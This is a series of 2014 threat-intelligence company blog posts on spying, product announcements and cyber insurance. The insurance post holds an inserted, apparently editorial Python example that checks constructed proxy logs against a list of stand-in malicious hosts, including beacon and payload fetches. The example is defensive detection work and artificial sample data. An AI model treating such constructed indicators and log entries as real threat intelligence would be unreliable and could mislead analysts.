I'm keeping it short. It's the one sunny day we're expected to have this weekend, so I'm going to take advantage of it. I hope you do too.

Have a great Labor Day weekend!
Jeff




Tuesday, August 26, 2014

Wapack Labs Blog: Wapack Labs Technical Analysis: VSkimmer and Black...

Wapack Labs Blog: Wapack Labs Technical Analysis: VSkimmer and Black...: Originally published on January 30, 2014, this analysis product was offered privately during the height of the Target breach. Over the weeke...

Saturday, August 23, 2014

Red Sky Weekly: Shocking!

Author: Cuban political cartoonist Antonio Prohías
German intelligence spies on Americans and Turks?

Chinese Hackers targeting information on MH370?

Malware targeting ex-Soviet states has Russian hallmarks?

Say it ain't so!

For months we've read stories about the NSA. I thought I'd take a moment and talk about the second oldest profession in the world: spying. Every country has organizations dedicated to this craft. And with 196 plus or minus countries in the world (depending on who's counting), you'd be hard pressed to find a country with just one intelligence organization. Most have several. Add in another 10,000 marketing/intelligence shops owned by companies, the fact that the Society of Competitive Intelligence Professionals boasts chapters all over the world, and a quick Google for Competitive Intelligence yields over 10 million hits. Ever read an analyst report when you're thinking about buying stock? When you're using it to make decisions about what to buy, that's intelligence...

There is no escaping this fact. Intelligence is everywhere. And cyber is one easy place to get it.

In 1999, I gave a talk at SANS on this very topic. At the time, I was both an intelligence officer and a SCIP member. I talked of the movement of spying toward cyberspace, offering examples of paid intelligence collectors, working in the private sector, grabbing precious information from other companies via computers. I spent some time actually teaching my audience how this is done, and for all of the work I'd done preparing the presentation, my reviews came back with comments like "Stutzman is selling snake oil", "The sky is not falling!" and "What planet is this guy from?" I'll never forget it. I was not invited back.

Since then, I've given that same talk, unedited, in pieces or in its entirety, as if it was still 1999, dozens of times --Navy War College's Strategic Studies Group (where Navy Captains go when they're about to put on a star), during classes at Norwich, Worcester Polytechnic Institute and Harvard, and more times than I can count to new analysts. It was a simpler time, but nonetheless, that talk from 1999 holds true today, and was dead on then. I remember it well. I liken good intelligence to information presented by securities researchers when their bosses are playing the market. The reports offer recommendations at the top of the page; they offer some kind of mechanism to score the researcher, and then lay. (I'll save this for another blog entitled "What does good intelligence actually look like?") It's beautiful!

What does intelligence look like in cyberspace? How does one go about collecting it? My talk included that too... and at the time, the USSR was breaking up and those spies, needing jobs, migrated largely to countries in Europe... including Germany. Many worked for the banking community, attempting to help protect investments. Think they're the only ones? Many of my former co-workers and peers also now work for corporate America. And what do you think they (we) do? Intelligence, research and analysis. Pick a country and I'll tell you a non-military story of how someone is spying on someone else for money. We expect it from the government. It's the second oldest profession in the book.

So, hold on to your hats, folks. Cyber increases the speed by which access can be gained to specific information. It offers access to vastly larger caches of data as storage becomes smaller and the amount of data it can hold becomes bigger. And computers can be targeted like no human ever could... silent, fast, accurate. And it is very much taken advantage of.

Does it come as a surprise that German intelligence folks are spying on the US and Turkey? No. Pick a country... they're spying on someone, either for military or economic gain... and your computer is the easiest place to get information from.

I love my job!

If you'd be interested in seeing the presentation, drop me a note. We'll set something up.

BT BT

It's been a great week.

Announcing Beadwindow on Threat Connect!

I'm happy to announce that we've partnered with Threat Connect to make our Beadwindow portal (our open portal) available on Threat Connect. The site is set up and we're moving content over as we speak. Interested in membership? Rick is the Beadwindow Community Director and can get you set up. Contact Rick.

In the Red Sky private portal:
  • The Red Sky portal has been really busy. Normally over the summer it takes a dip, but not this year. We added a couple of new members, including one this week.
  • We continue to watch and blog lessons from the cyber activities undertaken during the Ukraine/Russia conflict, and we posted updated GEOPOL reporting.
  • And this week we loaded up caches of tools known to be used by a couple of prolific groups. It's not all been analyzed, but there's plenty of talent in the portal to assist.
In Wapack Labs:

Threat Recon adoption continues to grow. 

https://pypi.python.org/pypi/threatrecon
Yesterday, Seth Bromberger, one of our friends and an expert in the industrial controls security community, posted a Threat Recon Python module to PyPI (python.org) and GitHub. In the last 24 hours, there've been 478 downloads!

We've put up our internal Maltego server. The transforms work wonderfully (thanks Bart!).

We're not a CRITs shop, but there are scripts written and posted on GitHub for CRITs integration.

And standby folks, Splunk is coming!

Enough for now. Until next week, have a great weekend!
Jeff






Friday, August 22, 2014

New API module for Wapack's ThreatRecon!

Thanks to Seth Bromberger for writing a Python module for our cyber threat intelligence system ThreatRecon. You can download the module here: https://pypi.python.org/pypi/threatrecon

Thanks Seth!

Saturday, August 16, 2014

Red Sky Weekly: The unsexy truth about cyber insurance.

I know cyber risk insurance isn't one of life's most sexy topics, but it is one worthy of discussion. I was reading an article by Craig Carpenter titled "Lack of Incident Response Holding Back Cyber Insurance Market" this afternoon (the article can be found here: http://tinyurl.com/pn2yjs8). Craig made some very good points in his "Three Simple Steps" that will help both the insured and the insurance companies work together towards common ground. These steps include: detection and swift response, full-fledged incident resolution teams, and working with clients to develop best practices starting with "Mean Time to Response (MTR)." Each step should be considered by any organization, if not already in place, and each is really part of good overall cyber hygiene. With these steps in place, organizations are already mitigating much of the cyber risk and insuring themselves against costly, and often, cyber incidents.

What if insurance companies planning to write cyber risk insurance took the time to assess the "Cyber Health" of the potentially insured before writing policies? When I shopped for life insurance when my children were young, I answered pages of health history questions about myself and my family. Then there were the urine and blood tests and the blood pressure cuff. The insurance company was really interested in my current health condition(s) prior to estimating how healthy I would be in the future. Why are insurance companies not requesting a cyber "health" assessment prior to insuring companies, not just from a cyber risk standpoint but from an all-inclusive business risk perspective?

Network data can be analyzed through a number of tools; ThreatRecon comes to mind (www.threatrecon.co). Tools that can quickly assess the malicious activity found on the potentially insured network can go a long way in helping actuaries assess the potential for financial loss in the event of a network breach. Indicators from a client's network data can be run against indicators known to be questionable or even dangerous. Wouldn't an underwriter be interested in knowing if a potential insured was already p0wned before writing any coverage? Tools such as ThreatRecon could also allow a business owner or third-party analyst to review their data before calling their insurance agent for a bid. If you have a verified "sound" cyber health check, shouldn't you get a better price on your new policy? Knowing the context behind threats that may already be hitting your servers would be even better; why not raise the level of prevention before you experience a breach?
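The kind of check this paragraph describes, as an added example that is not ThreatRecon's or Wapack Labs' code: destinations pulled from a few constructed proxy log lines are matched against a constructed indicator set that carries the confidence and attribution context the post talks about, and the result is summarized the way an underwriter or analyst might want it. A local dictionary stands in for the real lookup service, which is not called here.

```python
"""Added example (not Wapack Labs / ThreatRecon code): a local 'cyber health'
check matching proxy-log destinations against a known-bad indicator set that
carries confidence and attribution. Logs and indicators are constructed."""
import re
from collections import defaultdict

# Constructed indicator set with context; stands in for a ThreatRecon lookup.
KNOWN_BAD = {
    "evil-update.example": {"confidence": 90, "attribution": "Group A (constructed)"},
    "203.0.113.45": {"confidence": 70, "attribution": "Group B (constructed)"},
    "cdn-static.example": {"confidence": 20, "attribution": "unknown"},
}

# Constructed proxy log lines: timestamp, source host, method, destination, status.
SAMPLE_LOGS = """\
2014-08-16T10:01:02 ws-017 GET http://evil-update.example/upd.bin 200
2014-08-16T10:01:09 ws-017 GET http://intranet.example/home 200
2014-08-16T10:02:44 ws-042 CONNECT 203.0.113.45:443 200
2014-08-16T10:03:10 ws-042 GET http://cdn-static.example/lib.js 200
2014-08-16T10:04:00 ws-099 GET http://evil-update.example/beacon 404
"""

# Pulls the host (or IP) out of a URL or host:port destination field.
_HOST_RE = re.compile(r"^(?:https?://)?([A-Za-z0-9.-]+)(?::\d+)?(?:/|$)")


def extract_indicators(log_text):
    """Map each destination host seen in the logs to the internal hosts that reached it."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # skip malformed lines rather than crash the assessment
        m = _HOST_RE.match(parts[3])
        if m:
            seen[m.group(1).lower()].add(parts[1])
    return seen


def health_check(log_text, min_confidence=50):
    """Return matches at or above min_confidence (highest confidence first),
    the top confidence as a crude risk figure, and how many hosts are affected."""
    matches, affected = [], set()
    for ioc, hosts in extract_indicators(log_text).items():
        ctx = KNOWN_BAD.get(ioc)
        if ctx and ctx["confidence"] >= min_confidence:
            matches.append({"indicator": ioc, "hosts": sorted(hosts), **ctx})
            affected |= hosts
    matches.sort(key=lambda m: -m["confidence"])
    risk = matches[0]["confidence"] if matches else 0
    return {"risk": risk, "affected_hosts": len(affected), "matches": matches}
```

Lowering `min_confidence` pulls in the low-confidence "cdn-static.example" hit, which is the trade-off an assessor makes between noise and coverage.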

The question will arise: who will pay for the cyber assessment? Of course the insurance company will not want to absorb the expense, but it could be listed on the insurance invoice as a consulting fee. I would hope that a business owner would like an independent assessment of their cyber health, especially since they are shopping for cyber insurance. When taking into account the costs associated with cyber breaches, both financial and reputational, the cost of an assessment is a fraction of post-breach cleanup. A sound plan to assess a business's network, knowing the cyber health of your own company first, and then implementing Craig's Three Simple Steps looks like a winning combination to me.

BT BT

Yesterday, we held our first webinar for ThreatRecon, Wapack Labs' cyber threat intelligence API. The webinar was very well attended by more than thirty of some of the best analysts in the industry. We couldn't have been more pleased! The feedback from the cyber community remains very positive and the adoption rate for the platform is growing daily. Giving cyber security teams the means to look at hundreds of thousands of high-confidence indicators with full context and full attribution fills not only the need for quick answers from analysts but also the need for the compelling stories CISOs require when advocating to keep their operations fully funded.


Wapack Labs offers ThreatRecon for free for the first thousand queries – we believe that strongly in our mission and core values of protecting organizations from cyber threats. You can get started by going to the ThreatRecon website at https://www.threatrecon.co. If you didn't have the opportunity to see the webinar, you can watch it here: https://vimeo.com/103543432